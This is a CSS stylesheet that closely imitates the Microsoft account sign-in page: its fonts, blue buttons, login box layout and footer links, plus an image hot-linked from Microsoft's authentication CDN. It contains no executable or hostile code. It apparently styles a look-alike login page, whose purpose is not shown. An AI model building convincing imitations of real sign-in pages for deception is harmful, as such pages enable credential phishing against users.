body {
    background-image: url('../assets/images/background.svg');
    background-repeat: no-repeat;
    background-size: cover;
    background-position: center center;
    background-attachment: fixed;

    font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math", serif;
    margin: 0;
    height: 100vh;
}

main#main {
    display: flex;
    flex-direction: column;
    align-items: center;
    min-height: 100vh;
    justify-content: center;
}

.main-box {
    display: flex;
    flex-direction: column;
    align-items: flex-start;
    gap: 10px;
    max-width: 440px;
    width: 100%;
    padding: 44px;
    background-color: #fff;
    box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
    min-width: 320px;
    min-height: 338px;
    overflow: hidden;
    margin: 0;
}

.sing-in-title {
    font-size: 1.5rem;
    font-weight: 600;
    color: #1b1b1b;
    line-height: 1.75rem;
    font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math", serif;
}

.no-account, .cant-access {
    font-size: 13px;
    margin-bottom: 16px;
    width: 100%;
}

.no-account {
    margin-bottom: 13px;
}

.create-account, .cant-access {
    text-decoration: none;
    color: #0067b8;
}

.create-account:hover, .cant-access:hover {
    text-decoration: underline;
}

.lower-block {
    display: flex;
    margin: 20px auto 0 auto;
    max-width: 440px;
    width: calc(100% - 40px);
    background-color: #fff;
    box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
    min-width: 320px;
    cursor: pointer;
    height: 48px;
    padding: 8px 44px 8px 44px;
}

.lower-block > div {
    display: flex;
    align-items: center;
}

.lower-block-image {
    width: 32px;
    height: 32px;
    background-image: url('https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg');
    background-size: cover;
    margin-right: 10px;
}

.lower-block-text {
    font-size: .9375rem;
    line-height: 1.25rem;
    font-weight: 400;

}

.button.back {
    line-height: normal;
    text-overflow: ellipsis;
    background-color: rgb(204, 204, 204);
    color: #000;
    border: 2px solid rgb(204, 204, 204);
    margin-right: 5px;
    font-weight: 400;
}

.button.back:hover {
    background-color: rgb(170, 170, 170);
    border-color: rgb(170, 170, 170);
}

.lower-block:hover {
    background-color: rgb(229, 229, 229);
}

.button.back:focus {
    outline: 2px solid rgb(170, 170, 170);
    outline-offset: 2px;
}

.button.back:active {
    background-color: rgb(136, 136, 136);
    border-color: rgb(136, 136, 136);
}

* {
    box-sizing: border-box;
}

#error-message {
    display: none;
    color: #E9182A;
    font-size: 15px;
    margin-bottom: 8px;
    line-height:20px;
    font-weight: 400;
    font-style: normal;
}

.btn, button, input[type='button'], input[type='submit'], input[type='reset'] {
    margin-top: 0;
    margin-bottom: 0;
    min-height: 32px;
    min-width: 108px;
    padding: 4px 12px;
    font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", sans-serif;
    font-size: 0.9375rem;
    line-height: 1.25rem;
    font-weight: 400;
    cursor: pointer;
    transition: background-color 0.3s ease, border-color 0.3s ease;
    display: inline-flex;
    align-items: center;
    justify-content: center;
    text-align: center;
    white-space: nowrap;
    overflow: hidden;
    text-overflow: ellipsis;
    touch-action: manipulation;
    color: #fff;
    background-color: #0067b8;
    border: 2px solid #0067b8;
}

.buttons-block {
    display: flex;
    justify-content: flex-end;
    width: 100%;
}

.button {
    width: auto;
}

.button:hover {
    background-color: #005A9E;
    border-color: #005A9E;
}

.button:focus {
    outline: 2px solid #005A9E;
    outline-offset: 2px;
}

.button:active {
    background-color: #004578;
    border-color: #004578;
}

footer {
    position: absolute;
    left: 0;
    bottom: 0;
    width: 100%;
    overflow: visible;
    z-index: 99;
    clear: both;
    min-height: 28px;
    display: flex;
    justify-content: flex-end;

    .more, .privacy-cookies, .terms {
        margin: 0 8px;
        color: #000;
        font-size: 12px;
        line-height: 28px;
        white-space: nowrap;
        cursor: pointer;
    }

    .privacy-cookies:hover, .terms:hover {
        text-decoration: underline;
    }

    .more {
        text-decoration: none;
        letter-spacing: 3px;
        line-height: 22px;
        vertical-align: top;
        font-size: 16px;
        font-weight: 600;
    }
}


.data-input {
    width: 100%;
    padding: 6px 10px 6px 0;
    border: none;
    border-bottom: 1px solid rgba(0, 0, 0, 0.6);
    background-color: transparent;
    outline: none;
    box-sizing: border-box;
    text-overflow: ellipsis;
    margin-right: 5px;

    font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math", serif;
    font-style: normal;
    font-weight: 400;
    color: #1b1b1b;
    font-size: 15px;
    line-height: 20px;
}

.input::placeholder {
    font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", Roboto, Ebrima, "Nirmala UI", Gadugi, "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", Tunga, "Lao UI", Raavi, "Iskoola Pota", Latha, Leelawadee, "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math", serif;
    font-style: normal;
    font-weight: 400;
    color: #1b1b1b;
    font-size: 15px;
    line-height: 20px;
}

.data-input:focus {
    border-bottom-color: #0067b8;
}


